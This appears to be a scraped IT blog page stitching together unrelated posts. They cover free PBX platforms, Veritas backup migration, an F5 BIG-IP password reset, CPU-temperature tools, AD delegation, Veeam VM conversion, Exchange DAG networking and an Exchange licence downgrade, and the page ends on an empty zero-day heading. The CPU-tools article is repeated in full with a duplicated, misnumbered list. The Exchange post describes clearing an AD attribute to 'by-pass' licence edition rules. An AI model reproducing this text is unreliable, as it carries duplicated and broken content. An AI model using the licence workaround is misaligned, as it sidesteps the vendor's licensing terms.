Top 13 Free PBX business solutions

Adopting an existing VOIP service from the top PBX providers is a suitable solution for many companies. But it is not an easy job to find the right one.

Providers are constantly trying to individually fit the needs of every customer. Finding the right solution for every use case might be almost impossible, keeping in mind the team size, required features, and security issues. 

Companies can try out open-source solutions or platforms for all those cases when a service does not fit their expectations and requirements. 

Are there really free PBX solutions? Yes, there are. These are open-source PBX software solutions. Necessary hardware needs to be provided, which is a suitable computer.

Any business can develop and tailor its own in-house PBX applications using free PBX software. The source code is available online and can be tailored for every specific scenario.

ASTERISK

Asterisk is “the father” of all open source PBX and VOIP solutions. It is the leading open-source telephony platform, with enormous feature lists which only continue to grow. 

The Asterisk toolkit is used by a mass quantity of developers around the world. Many of the suppliers on this PBX list have either begun with or are based completely on the Asterisk project.

It is packed with the standard PBX VOIP features. They consist of an automatic telephone, an interactive voice response menu, conference calling, and voicemail. 

The Asterisk makes it easy to turn any computer into a PBX. 

As a popular platform Asterisk provides web classes and tutorials to help users do their job with the platform.

VITALPBX (GUI)

Compared to the other free solutions on this list, VitalPBX is rather new. And while the first version was released in early 2018 they have worked really hard and are now offering a well-developed feature-rich product.

The VitalPBX platform can be installed on physical hardware or the cloud. It is essentially a Linux-based Graphical User Interface for Asterisk and as such, it can be run with minimal effort. The interface is well structured and its features are easy to find and use.

VitalPBX is completely free to use, a professional support package and add-ons are available as paid options.

SIP FOUNDRY

SIP Foundry provides many of the solutions that the Asterisk engine can power. You can construct your own voice and video communications with SIPFoundry. Also, it supports conference calls, messaging, and chat. Like with Asterisk, the platform includes everything you might need to build your own PBX solution.

While Asterisk is 100% free and open-source, SIPFoundry has a somewhat different spin. It offers professional paid assistance to developers based upon customer needs. It might seem like excess income, adopting a support team might be an essential step for some businesses looking to build their own system. With a focus on the marketplace, the tool is free for commercial or private use. 

This project has some of the features taken from the HylaFAX, FreePBX, Openfire, and Postfix open-source projects.

ELASTIX

Elastix brings in Asterisk’s features and other such projects, all under one easy-to-use interface. 

Elastix supports a wide range of hardware consisting of Yeastar, Dinstar, Digium, Yealink, and Snom. It was one of the first distributions that included a call center module. 

And it continues to supply the solution-free under the GNU General Public License.

Currently, Elastix is owned by 3CX  and can be found in 2 versions (OLD and NEW). The old one is still preferred by many but lacks in security as it is discontinued and gets no security updates. The new version is just the Linux version of 3CX now.

ISSABEL

Issabel is the unofficial successor of the old Elastix. It offers way better security and frequent patches.  The platform is a lot better looking and feeling and they have spent a good amount of time cleaning it. 

The platform is free. It is open-source and there are not many pricing options or catches. The support is paid and there are a few paid add-ons. The source code can be freely downloaded from SourceForge or GitHub

Issabel uses addons that help satisfy almost every need. Lately, they have also worked hard on their API so you can expect a lot more than the old Elastix.

That being said we must mention that there is almost no documentation on Issabel and half of the available information is in forums making it hard to find.  The other half of the information is sadly in Spanish.

FreeSWITCH

Free SWITCH was also based on the Asterisk platform and was created and developed by three of the original programmers of the Asterisk platform. Anthony Minessale II, Brian West, and Michael Jerris.

FreeSWITCH is with a focus on the modulators, cross-platform service, availability, and stability. 

It provides one of the most flexible platforms to construct your own UC package. FreeSWITCH supports SIP, H.323 as well as WebRTC to leverage the latest advancements in technology. 

It can integrate and interface with some of the other open-source PBX platforms. For less complexity, FreeSWITCH utilizes open software libraries that perform essential functions. FreeSWITCH delivers the calling features and some extras such as speech recognition. It also offers PSTN ports for digital and analog circuits.

VOICETRONIX

Voicetronix is an equipment supplier, an open-source platform, and also an assortment of hardware. 

This is a web-enabled PBX program. It comes with a web-based user management portal, in addition to a management GUI for easy and rapid configuration. It features car attendant, automatic call distribution, call routing search groups, and even voicemail. Unique features like call hunt groups, music-on-hold, and call records are a good solution for businesses in need of basic call center software. 

With CRM-baked and enabled into the platform, users may not require to adopt a separate CRM solution, saving time and money.

PBXINAFLASH

PBXInAFlash’s main feature is the ability to set up your own PBX server in no time. The project has everything needed to set up a PBX system in less than an hour. 

It uses CentOS, with an integrated Apache web server, SendMail server, and MySQL database, in addition to firewalls and all essential protocols. 

Users have the option to pick from dozens of add-ons to tailor the system. Backups, Caller ID lookup services, SSL keys, Google Voice integration, and fax support to name a few. PBXInAFlash seems to be the easiest and the quickest solution to adopt.

FreePBX (GUI)

FreePBX combines the best of both worlds and leverages the work. The project uses the Asterisk system. This is the most recommended free PBX for new users.

Users may download either just the GUI or the whole package. It consists of a pre-configured OS, Asterisk, and the FreePBX GUI. So while by adopting Asterisk, some knowledge may be required to take advantage of, or to create your own GUI, FreePBX brings it all together. FreePBX makes it feasible to establish your SIP Trunks that are part of the platform thanks to the integration. FreePBX also contains a long list of commercial modules and add-ons to enhance your system with even more features.

opensips

With OpenSIPs it is easy to set up your own PBX. It focuses on the open-source implementation of a SIP server.  The platform supports video, voice, IM, and presence services. It is using a modular design, it is scalable and very much customizable. 

OpenSIPs offers enterprise-class SIP server solutions and a very fast one at that. OpenSIPs has made a list of benchmarks and performance tests to back their claim up. 

OpenSIPs often records webinars and makes in-depth manuals for configuration similar to Asterisk.

A web interface makes it easy to collect data and shows on-the-fly configurations.

BITRIX24

Bitrix24 offers its free virtual and PBX solutions to small businesses. And it comes with quite a lot of free, and handy business tools. Their PBX is also based on VoxImplant which is actually a good sign. Keep in mind that there might be some small fees and taxes involved when adding phone numbers.

Bitrix24 is not focusing mainly on the VoIP or PBX market and is trying to sell you its customer relationship management (CRM) software along the way. If it were not for that, we would have highly recommended them.

KAMAILIO

Kamailio is an open-source project with 15 years of constructive development. The original company left the project, but it continues to expand. Both the SIP server and Kamailio project continue to be built on.

It features UDP asynchronous TCP and SCTP, TLS to ensure secure communication. VoIP data consisting of voice video and text, and even WebRTC support is also present. Kamailio also supports instant messaging, least-cost routing, load balancing, routing failover. 

With authentication and authorization for enhanced security, as well as a high level of encryption Kamailio offers the strongest level of security on this list. It makes it a good recommendation for any staff or business that needs to keep everything as locked down and protected as possible. As a result of all that, Kamailio may be a bit more challenging to adopt.

3CX

The 3CX Phone System is the last open-source PBX based on the SIP standard. This solution allows extensions to make calls on the PSTN or standard services. 

The platform also offers an easy-to-understand web-based GUI. The setup process is actually simple – an executable file. 

3CX supports iOS and Android for mobile customers. Windows and Mac softphones are supported, too. It appears to take out the hassle of development required to establish your own PBX server. WebRTC adoption makes web conferencing possible. Click2Call and CRM are also part of the features. 

Like the rest, an internet training academy is available for users to understand how to manage the platform.

Phương Nguyễn

CÁCH DI CHUYỂN BACKUP VERITAS SERVER SANG SERVER VERITAS BACKUP MỚI

Ngữ cảnh

Trong quản trị hệ thống vì lý do cần nâng cấp hệ thống backup chúng ta cần move hệ thống lưu trữ backup vertias cũ sang hệ thống server mới. Hôm nay Phương nguyễn sẽ giới thiệu các bạn cách move hệ thống backup veritas server từ server cũ sang hệ thống máy chủ mới.

Các bước thực hiện

Bước 1: Dĩ nhiên phải setup full máy mới

Bước 2: Ở Server cũ STOP ALL SERVICES SERVER VERITAS CŨ

Bước 3: Backup SQL Databases backup db

Sử dụng công cụ SQL manager nếu có hoặc dùng luôn tính năng của Vertias nhé.

Bước 4: Copy database hoặc restore vào server mới

Trước khi copy hoặc backup chúng ta phải stop all services Vertias và SQL

Hoặc dùng tools

Trước khi restored chúng ta phải stop all services Vertias và SQL hoặc đưa mode single

ALTER DATABASE [bedb] SET SINGLE_USER WITH ROLLBACK IMMEDIATE

Restored bedb.bak vào server mới hoặc attachment file bedb_dat.mdf và bedb.ldf vào nhé

Hoặc sài Tools backup util Copy databases của Veritas lun nhé

Sau khi restored ok hoặc attachment đưa về mode multi user

ALTER DATABASE bedb

SET MULTI_USER;

Bước 5: Copy cac dữ liệu cũ sang server mới

Copy thư mục catalogs theo đường dẫn C:\Program Files\Veritas\Backup Exec\Catalogs sang server Mới đúng bằng đường dẫn đó.

Copy all data except the msgq*.*.dat files from the following directory:

C:\Program Files\Veritas\Backup Exec\Data

Copy the catalog files and folders from the following directory:

C:\Program Files\Veritas\Backup Exec\Catalogs

Copy the job log files from the following directory:

C:\Program Files\Veritas\Backup Exec\Data

Copy the IDR files from the following directory:

C:\Program Files\Veritas\Backup Exec\\sdr\

Copy the report files from the following directory:

C:\Program Files\Veritas\Backup Exec\Reports

C:\Program Files\Common Files\Veritas Shared\SavedReports

Copy the user configuration file, user.config, from the Documents and Setting directory.

Bước 6: Start lại toàn bộ dịch vụ Vertias backup như hình nhé

Reboot lại rồi kiểm tra server đã chuyển đổi nhé.

Kiểm tra Job Backup còn nguyên nhé.

Chúc các bạn thành công.

Tài liệu được viết bởi Phương Nguyễn… Các bạn like share nhé. Ghi rõ nguồn từ web nếu có sao chép.

Phương Nguyễn

Nguồn : https://viettechgroup.vn/cach-di-chuyen-backup-vertias-server-sang-server-vertias-backup-moi.html

Cách Reset Password Root Và Admin F5 BIG-IP Configuration Utility Bằng TMSH

Mô tả

Để cập nhật admin BIG-IP Configuration qua web thì chúng ta còn nhớ mật khẩu mới vào được. Tuy nhiên vì lý do gì đó quên luôn mật khẩu admin trên web. Chúng ta phải dùng đến công cụ TMOS Shell (tsmh) của F5 nhé.

Thực hiện

Bước 1: logon vào Shell hoặc SSH gỏ lệnh tmsh

tmsh

Bước 2: gỏ lệnh bên dưới

modify auth password root

Nhập password mới và nhập lại cho root account

Bước 3 : để reset luôn tài khoản web admin dùng để cấu hình gỏ lệnh bên dưới

modify auth user admin prompt-for-password

Bước 4 : lưu cấu hình bằng lệnh save sys config

save sys config

Bước 5: Quit

Kiểm tra lại logon nhé

Như vậy là thành công rồi nhé. Chúc các bạn reset thành công trong công việc quản trị F5 network.

Phương Nguyễn Viết

Vui lòng ghi rõ nguồn từ trang nếu có repost

Nguồn: https://viettechgroup.vn/cach-reset-password-root-va-admin-f5-big-ip-configuration-utility-bang-tmsh.html

TOP 10 phần mềm kiểm tra, đo nhiệt độ CPU máy tính chính xác nhất 2022

Đối với 1 quản trị viên, IT system hoặc Helpdesk thì các phần mềm hiển kiểm tra và đo nhiệt độ CPU trong bài viết này sẽ là trợ thủ đắc lực để bạn kiểm tra hiệu suất máy tính để tiện cho việc sửa chữa, khắc phục hoặc nâng cấp nếu cảm thấy cần thiết. Các công cụ này cũng là giúp các anh em báo cáo cũng như đưa ra con số định lượng, bằng chứng xác thực giúp đánh giá máy tính, tình trạng disk để có cơ sở nâng cấp.

Top 10 phần mềm kiểm tra và đo nhiệt độ CPU máy tính chính xác nhất hiện nay

1. Phần mềm AIDA64 Extreme

Tải về AIDA64 Extreme

AIDA64 Extreme thực sự là một phần mềm kiểm tra và đo nhiệt độ CPU nổi danh với khả năng thông báo hết sức chi tiết tình trạng phần cứng, từ đó thay người dùng đánh giá mức độ hiệu quả trong quá trình thiết bị vận hành. Các chức năng nổi trội của AIDA64 Extreme bao gồm đánh giá lỗi phần cứng, kiểm soát hoạt động CPU và khả năng đo nhiệt độ CPU.

2. Phần mềm SpeedFan

Tải về SpeedFan

Phần mềm đo nhiệt độ CPU Speedfan từ lâu đã được biết đến là một trong những công cụ hỗ trợ đo nhiệt độ CPU tốt nhất trên thị trường. Ngoài khả năng theo dõi hiệu quả tốc độ quạt, điện áp và mức nhiệt hiện tại của máy tính, CPU Speedfan con cho phép hiệu chỉnh tốc độ quạt theo ý muốn. Điều này giúp chủ nhân thiết bị chủ động được nếu cảm thấy quạt CPU chạy quá nhanh, quá chậm hay quá ồn.

3. Phần mềm CPU-Z

Tải về CPU-Z

CPU-Z được không ít người lựa chọn khi kiếm tìm một phần mềm hiển thị tốc độ CPU nhẹ và hiệu quả. CPU-Z nổi danh nhờ khả năng thống kê tên CPU, tên mã, chipset, chỉ số TDP tối đa, loại chân cắm CPU. Thông qua CPU-Z, bạn sẽ kiểm tra được nhiều thông tin về phần cứng thiết bị, dữ liệu CPU máy tính và bộ nhớ cache, đồng thời đo nhiệt độ CPU hiệu quả.

4. CPUID HWMonitor

Tải về CPUID HWMonitor

Nếu bạn cần một công cụ giám sát phần cứng hiệu quả thì CPUID HWMonitor sẽ là sự lựa chọn hết sức hợp lý bởi phần mềm này có thể theo dõi những chỉ số ảnh hưởng trực tiếp đến sức mạnh của hệ thống. CPUID HWMonitor có giao diện rất dễ dùng, nổi bật ở khả năng nhận biết nhiệt độ ổ cứng qua card video GPU và S.M.A.R.T.

5. Speccy

Tải về Speccy

Ngoài việc phản ảnh nhiệt độ CPU, phần mềm Speccy còn tỏ ra nổi trội ở việc hiển thị đầy đủ thông tin về CPU, RAM, Motherboard, Graphics, ổ cứng, ổ CD và Audio. Sự toàn diện và tính giản đơn của Speccy đem tới một phương án hữu hiệu nhất dành cho những ai muốn nắm được thông tin nhiệt độ cùng với hiệu suất phần cứng trên chiếc PC, laptop mình đang dùng.

6. HWiNFO64

Tải về HWiNFO64

Với HWiNFO64, người dùng có thể theo dõi nhiều thông tin chi tiết về tình trạng hoạt động cũng như những thông tin phần cứng như CPU hay RAM máy tính. Mọi chỉ số cần thiết như tốc độ quạt, nhiệt độ, nguồn và điện thế được hiển thị đầy đủ trong giao diện cũng góp phần biến HWiNFO64 thành công cụ giám sát hệ thống đắc lực.

6. HWiNFO64

Tải về HWiNFO64

Với HWiNFO64, người dùng có thể theo dõi nhiều thông tin chi tiết về tình trạng hoạt động cũng như những thông tin phần cứng như CPU hay RAM máy tính. Mọi chỉ số cần thiết như tốc độ quạt, nhiệt độ, nguồn và điện thế được hiển thị đầy đủ trong giao diện cũng góp phần biến HWiNFO64 thành công cụ giám sát hệ thống đắc lực.

8. Real Temp

Tải về Real Temp

Nổi bật ở tác vụ phân tích nhiệt độ các loại chip máy tính, Real Temp là công cụ hỗ trợ quản lý quá trình làm việc hết sức đắc lực, giúp bạn thấy được đâu mới là tốc độ lý tưởng nhất cho chiếc PC/laptop mà mình sở hữu. Bạn cũng có thể thông qua Real Temp để biết được nhiệt độ tối thiểu và tối đa của cả hệ thống.

9. MSI Afterburner

Tải về MSI Afterburner

Nhờ giao diện thiết kế đẹp mắt mang phong cách gaming và khả năng hỗ trợ ép xung laptop chuyên nghiệp, MSI After burner trở thành phần mềm hiển thị nhiệt độ CPU trên laptop được nhiều game thủ lựa chọn. Nhìn trong hình dưới, chắc hẳn bạn cũng thấy rõ chỉ số tốc độ CPU được đặt ở vị trí rất dễ quan sát. Ngoài ra, bạn còn có thể thông qua MSI After burner để hiệu chỉnh tốc độ quạt và gia tăng hiệu suất bộ nhớ.

10. NZXT’s Cam software

Đây là một phần mềm có giao diện khá đẹp, thân thiện và dễ dùng, bao gồm nhiều mục giám sát như CPU, GPU, HDD, Network….Ngoài ra,bạn có thể mua 1 số linh kiện của hãng NZXT để dùng trong cùng 1 ứng dụng như mod đèn, chỉnh các chế độ đèn case…

Cách kiểm tra nhiệt độ CPU máy tính không cần phần mềm

Để thực hiện cách kiểm tra nhiệt độ CPU không cần phần mềm này, bạn cần mở BIOS bằng cách khởi động lại máy tính, sau đó nhấn các phím chức năng (Fn) ngay khi logo thương hiệu hiện ra.

Lúc này, bạn truy cập vào mục PowerTại dòng CPU Temperature, hệ thống sẽ cho bạn thấy được mức nhiệt của CPU hiện tại là bao nhiêu.

Cách ủy quyền quyền để cho phép người dùng tham gia máy tính vào miền AD-Join Domain

Ngữ cảnh

Câu chuyện quản trị system của Doanh nghiệp thường quy mô cở trung, vừa to,… Nếu doanh nghiệp chúng ta nhỏ thường ông quản trị mạng làm hết nghĩa là roles và vai trò system admin, network admin là 1 nói chung là all in one 🙂 đó là câu chuyện đương nhiên để tiết giảm chi phí cho Doanh nghiệp. Tuy nhiên đối với Doanh nghiệp lớn SMB to hệ thống vài 1000 user đến vài trăm ngàn user, thì IT helpdesk cần có và phân công nhiệm vụ rõ ràng. Ông System Admin quản trị Domain controller rồi có thể cho các bạn Helpdesk hoặc đơn vị nào đó ví dụ Outsoucing để có quyền tham gia hay join máy tính vào domain. Câu chuyện đặt ra chúng ta không thể một mình làm hết được nên chúng ta phải cho phép ủy quyền 1 số nhóm hoặc người dùng helpdesk làm công chuyện này. Dĩ nhiên loại trừ 1 số người dùng có số lần join domain là 10 lần.

Giải pháp

Hôm nay phương nguyễn chia sẽ đến các bạn một mẹo nhỏ trong quản trị hệ thống mạng Domain controller nhé để làm công đoạn này có 2 cách có thể làm:

  • Ủy quyền 1 nhóm người hoặc người nào đó có quyền sử dụng Active Directory Users and Computers mà cụ thể là join domain.
  • Tạo 1 chính sách GPO trên default domain group policy để cấp quyền

Các thực hiện ủy quyền trên ADUC

Để thực hiện delegation vào start-> gỏ lệnh dsa.ms run Active Directory Users & Computers

Tạo 1 nhóm để ủy quyền nhé ví dụ GroupITHelpdesk

Thêm các user cần ủy quyền join vào nhé ví dụ : jsisen, phuong

Muốn ủy quyền OU nào thì chọn OU đấy nhé hoặc có thể chọn cả domain 🙂 phải chuột chọn delegation

Chọn Nex->

Chọn -> Add group vừa tạo trên và chọn ok->next.

Chọn Delegation the following Common tasks-> Join a Computer to the domain

Hoặc chọn Create a custom task to delegate thì chọn Create computer object và Delete nhé.

Chọn Ok finish nhé.

Như vậy Phương Nguyễn chia sẽ cách ủy quyền 1 tài khoản hoặc nhóm có thể có quyền join domain. Chúng ta có thể bàn giao cho các anh em IT helpdesk đi làm mỗi 1 nhiệm vụ join thôi nhé.

Hehehe Nếu thấy hay hãy nhớ like và sharing cho các anh em IT và nếu có copy bài nhớ ghi source từ bài viết.

Phương Nguyễn Viết

CÁCH CHUYỂN MÁY ẢO VM TỪ VMWARE VSPHERE ESXI SANG HYPER-V BẰNG VEEAM BACKUP & REPLICATION -PHẦN 1

Ngữ cảnh

Trong quản trị hệ thống các anh em hay có như cầu chuyển đổi hệ thống ảo hóa qua lại với nhau từ các môi trường ảo hóa VMware Esxi sang hyper-v hoặc Hyper-V qua VMware Esxi, việc chuyển đổi này tương đương việc đổi các định dạng disk hệ thống cho phù hợp, Ví dụ Vmware (VMDK)=> Hyper-V (VHDX) hoặc ngược lại. Hôm nay Phương Nguyễn giới thiệu 1 tính năng rất hay của Veeam backup & Replication dùng để convert từ máy ảo VM từ môi trường VMware Vsphere Esxi sang Hyper-V nhé.

Thông tin

  • VM đang chạy ESXI6.7 đang chạy dịch vụ Microsoft Exchange 2016
  • Host Đang chạy Hyper-V cần move máy ảo Exchange qua.
  • Server Veeam backup & Replication v11 đã setup
  • Nhu cầu cần chuyển VM đang chạy Dịch vụ Microsoft Exchange 2016

Thực hiện

Tiến hành dùng Veeam and Replication để backup VM trên ESXI 6.7

Sau backup xong tiến hành restore chọn Hyper-V

Từ Home->backup->VM vừa backup xong chúng ta tận dụng tính năng Instant Recovery-> Microsoft Hyper-V. Ở đây có 2 tùy chọn VMware vsphere, nghĩa môi trường ngược lại thì chúng ta backup hyper-v restore sang Vmware, lab tôi đang cần move qua Hyper-V.

Chọn restore point cũng được, mặc định sẽ chọn backup cuối cùng

Chọn Host-> chọn Server Hyper-V cần migration qua

Chúng ta chọn nơi lưu cấu hình và disk cho VM cần move qua

Network để sau khi restore config sau

Giữ lưu UUID cũ,

Xem có scan virus không không cần bỏ qua

Retoring Instance nghĩa là sẽ mount trực tiếp từ respoisty lên làm datastores để chạy trực tiếp từ Hyper-V móc vào các Veeam backup nhé, mục tiêu giúp chạy nhanh giải quyết bussiness có thể giảm thiểu downtime hệ thống. Trạng thái các bạn đang thấy là status đã mounted.

Về mặt production sau khi đảm bảo giải quyết câu chuyện backup thì chúng ta sẽ chọn vào restore để migration to production chuyển đổi hoàn toàn luôn, nghĩa là sẽ copy và restoring sang host hyper-v nhé.

Khi migration to production chuyển trạng thái mounted-> restoring nhé.

Restore thành công nhé.

Như vậy là thành công chuyển đổi máy ảo Exchange 2016 từ môi trường VMware esxi vsphere sang môi trường Microsoft Hyper-V. Ngoài công cụ Veeam backup & replication có thể có nhiều công cụ giúp chúng ta chuyển đổi V2V, P2V… các bạn đoán xem phần 2 tại đây nhé.

Chúc các bạn thành công

Phương Nguyễn Viết

Vui lòng ghi rõ nguồn gốc nếu có copy

Nguồn https://viettechgroup.vn/cach-chuyen-may-ao-vm-tu-vmware-vsphere-esxi-sang-hyper-v-bang-veeam-backup-replication-phan-1.html

TOP 10 phần mềm kiểm tra, đo nhiệt độ CPU máy tính chính xác nhất 2022

Đối với 1 quản trị viên, IT system hoặc Helpdesk thì các phần mềm hiển kiểm tra và đo nhiệt độ CPU trong bài viết này sẽ là trợ thủ đắc lực để bạn kiểm tra hiệu suất máy tính để tiện cho việc sửa chữa, khắc phục hoặc nâng cấp nếu cảm thấy cần thiết. Các công cụ này cũng là giúp các anh em báo cáo cũng như đưa ra con số định lượng, bằng chứng xác thực giúp đánh giá máy tính, tình trạng disk để có cơ sở nâng cấp.

Top 10 phần mềm kiểm tra và đo nhiệt độ CPU máy tính chính xác nhất hiện nay

1. Phần mềm AIDA64 Extreme

Tải về AIDA64 Extreme

AIDA64 Extreme thực sự là một phần mềm kiểm tra và đo nhiệt độ CPU nổi danh với khả năng thông báo hết sức chi tiết tình trạng phần cứng, từ đó thay người dùng đánh giá mức độ hiệu quả trong quá trình thiết bị vận hành. Các chức năng nổi trội của AIDA64 Extreme bao gồm đánh giá lỗi phần cứng, kiểm soát hoạt động CPU và khả năng đo nhiệt độ CPU.

2. Phần mềm SpeedFan

Tải về SpeedFan

Phần mềm đo nhiệt độ CPU Speedfan từ lâu đã được biết đến là một trong những công cụ hỗ trợ đo nhiệt độ CPU tốt nhất trên thị trường. Ngoài khả năng theo dõi hiệu quả tốc độ quạt, điện áp và mức nhiệt hiện tại của máy tính, CPU Speedfan con cho phép hiệu chỉnh tốc độ quạt theo ý muốn. Điều này giúp chủ nhân thiết bị chủ động được nếu cảm thấy quạt CPU chạy quá nhanh, quá chậm hay quá ồn.

3. Phần mềm CPU-Z

Tải về CPU-Z

CPU-Z được không ít người lựa chọn khi kiếm tìm một phần mềm hiển thị tốc độ CPU nhẹ và hiệu quả. CPU-Z nổi danh nhờ khả năng thống kê tên CPU, tên mã, chipset, chỉ số TDP tối đa, loại chân cắm CPU. Thông qua CPU-Z, bạn sẽ kiểm tra được nhiều thông tin về phần cứng thiết bị, dữ liệu CPU máy tính và bộ nhớ cache, đồng thời đo nhiệt độ CPU hiệu quả.

4. CPUID HWMonitor

Tải về CPUID HWMonitor

Nếu bạn cần một công cụ giám sát phần cứng hiệu quả thì CPUID HWMonitor sẽ là sự lựa chọn hết sức hợp lý bởi phần mềm này có thể theo dõi những chỉ số ảnh hưởng trực tiếp đến sức mạnh của hệ thống. CPUID HWMonitor có giao diện rất dễ dùng, nổi bật ở khả năng nhận biết nhiệt độ ổ cứng qua card video GPU và S.M.A.R.T.

5. Speccy

Tải về Speccy

Ngoài việc phản ảnh nhiệt độ CPU, phần mềm Speccy còn tỏ ra nổi trội ở việc hiển thị đầy đủ thông tin về CPU, RAM, Motherboard, Graphics, ổ cứng, ổ CD và Audio. Sự toàn diện và tính giản đơn của Speccy đem tới một phương án hữu hiệu nhất dành cho những ai muốn nắm được thông tin nhiệt độ cùng với hiệu suất phần cứng trên chiếc PC, laptop mình đang dùng.

6. HWiNFO64

Tải về HWiNFO64

Với HWiNFO64, người dùng có thể theo dõi nhiều thông tin chi tiết về tình trạng hoạt động cũng như những thông tin phần cứng như CPU hay RAM máy tính. Mọi chỉ số cần thiết như tốc độ quạt, nhiệt độ, nguồn và điện thế được hiển thị đầy đủ trong giao diện cũng góp phần biến HWiNFO64 thành công cụ giám sát hệ thống đắc lực.

6. HWiNFO64

Tải về HWiNFO64

Với HWiNFO64, người dùng có thể theo dõi nhiều thông tin chi tiết về tình trạng hoạt động cũng như những thông tin phần cứng như CPU hay RAM máy tính. Mọi chỉ số cần thiết như tốc độ quạt, nhiệt độ, nguồn và điện thế được hiển thị đầy đủ trong giao diện cũng góp phần biến HWiNFO64 thành công cụ giám sát hệ thống đắc lực.

8. Real Temp

Tải về Real Temp

Nổi bật ở tác vụ phân tích nhiệt độ các loại chip máy tính, Real Temp là công cụ hỗ trợ quản lý quá trình làm việc hết sức đắc lực, giúp bạn thấy được đâu mới là tốc độ lý tưởng nhất cho chiếc PC/laptop mà mình sở hữu. Bạn cũng có thể thông qua Real Temp để biết được nhiệt độ tối thiểu và tối đa của cả hệ thống.

9. MSI Afterburner

Tải về MSI Afterburner

Nhờ giao diện thiết kế đẹp mắt mang phong cách gaming và khả năng hỗ trợ ép xung laptop chuyên nghiệp, MSI After burner trở thành phần mềm hiển thị nhiệt độ CPU trên laptop được nhiều game thủ lựa chọn. Nhìn trong hình dưới, chắc hẳn bạn cũng thấy rõ chỉ số tốc độ CPU được đặt ở vị trí rất dễ quan sát. Ngoài ra, bạn còn có thể thông qua MSI After burner để hiệu chỉnh tốc độ quạt và gia tăng hiệu suất bộ nhớ.

10. NZXT’s Cam software

Đây là một phần mềm có giao diện khá đẹp, thân thiện và dễ dùng, bao gồm nhiều mục giám sát như CPU, GPU, HDD, Network….Ngoài ra,bạn có thể mua 1 số linh kiện của hãng NZXT để dùng trong cùng 1 ứng dụng như mod đèn, chỉnh các chế độ đèn case…

Cách kiểm tra nhiệt độ CPU máy tính không cần phần mềm

Để thực hiện cách kiểm tra nhiệt độ CPU không cần phần mềm này, bạn cần mở BIOS bằng cách khởi động lại máy tính, sau đó nhấn các phím chức năng (Fn) ngay khi logo thương hiệu hiện ra.

Lúc này, bạn truy cập vào mục PowerTại dòng CPU Temperature, hệ thống sẽ cho bạn thấy được mức nhiệt của CPU hiện tại là bao nhiêu.

Network Adapter Configurations For DAG Members best practice

It is important to configure the network adapter settings correctly for a DAG member. Few points that need to be noted:

  • Single NIC for DAG members is supported.
  • All DAG members should have the same number of networks, MAPI and Replication networks.
  • DAG members can have only one MAPI network and zero or more Replication networks.
  • Persistent static routes are used to configure traffic in a replication network.
  • It is recommended to have atleast two DAG networks, MAPI and a replication network.

The MAPI network should be connected to the production network, so that it can talk with other Exchange servers, AD, DNS etc. The MAPI network (NIC) should be configured as given in the table below.

Networking FeaturesSetting
Client for Microsoft NetworksEnabled
QoS Packet SchedulerOptionally enable
File and Printer Sharing for Microsoft NetworksEnable
Internet Protocol Version 6 (TCP/IP v6)Optionally enable
Internet Protocol Version 4 (TCP/IP v4)Enabled
Link-Layer Topology Discovery Mapper I/O DriverEnabled
Link-Layer Topology Discovery ResponderEnabled

Configure the following as well for the MAPI network.

  • The IP address can be manually assigned or configured to use DHCP. If DHCP is used, use persistent reservations for server’s IP address.
  • The MAPI network typically uses a default gateway, although one isn’t required.
  • At least one DNS server address must be configured. Using multiple DNS servers for redundancy.
  • The “Register this connection’s addresses in DNS” checkbox should be checked.

The Replication network (NIC) should be configured as given in the table below.

Networking FeaturesSetting
Client for Microsoft NetworksDisabled
QoS Packet SchedulerOptionally enable
File and Printer Sharing for Microsoft NetworksDisabled
Internet Protocol Version 6 (TCP/IP v6)Optionally enable
Internet Protocol Version 4 (TCP/IP v4)Enabled
Link-Layer Topology Discovery Mapper I/O DriverEnabled
Link-Layer Topology Discovery ResponderEnabled

Configure the following as well for the MAPI network.

  • The IP address can be manually assigned or configured to use DHCP. If DHCP is used, use persistent reservations for server’s IP address.
  • The Replication network typically doesn’t use a default gateway. If MAPI network has a gateway configured, then, no other networks should have a default gateway.
  • DNS server address should not be configured.
  • The “Register this connection’s addresses in DNS” checkbox should be unchecked.

Finally, the binding order has to be such that MAPI network comes first in the list.

Good Luck

Cách chuyển hạ cấp key bản quyền Exchange Server Enterprise về Standard

Microsoft_Exchange_(2019-present).svg

Có một điều khi chúng ta đã cài Microsoft Exchange Server mà đã kích hoạt bản quyền key là Enterprise. Vì 1 lý do nào đó cần chuyển đối từ Enterprise về standard. Theo Microsoft thì khả năng từ nhỏ lên cao có thể ugprade ok tuy nhiên hạ cấp từ Enterprise về standard thì như thế nào ?

Hôm nay Phương Nguyễn chia sẽ các bạn cách hạ cấp key license Exchange Server đã kích hoạt từ Enterprise về standard, Như chúng ta đã biết các sương sống của Exchange chính là hệ thống domain controller nghĩa là mọi thông tin Exchange đều lưu trên Active Directory, nên chúng ta sẽ căn cứ vào đây để by-pass nhé.

Các bước như sau:

Bước 1: Chúng ta logon vào Domain controller mở run gỏ lệnh adsiedit.msc

Bước 2: Right click->Chọn Connect to => Configuration

Bước 3: Theo đường dẫn sau:

Mở Configuration > Services > Microsoft Exchange > Domain/Org > Administrative Groups > Exchange Administrative Group (FYDIBOHF23SPDLT) > Servers

Thay domain của các bạn nhé: ví dụ đây là PHUONG2.lab

Configuration > Services > Microsoft Exchange >PHUONGIT > Administrative Groups > Exchange Administrative Group (FYDIBOHF23SPDLT) >Servers

Bước 4 Chọn phải chuột vào Server ví dụ đây là Lab-EX2019 => chọn thuộc tính msExchProductID clear trắng nhé, có thể copy lại lưu 1 bản.

Chọn Clear => chọn oke nhé lưu lại

Quay lại Exhange Server để nhập lại key hoặc Powershell

Set-ExchangeServer -Identity LAB-EX2019 -ProductKey xxxxx-xxxxx-xxxxx-xxxxx-xxxxx 

Chúc các bạn thành công

Phương nguyễn viết.

CẢNH BÁO CHIẾN DỊCH TẤN CÔNG SỬ DỤNG LỖ HỔNG ZERO DAY TRÊN MICROSOFT EXCHANGE SERVER

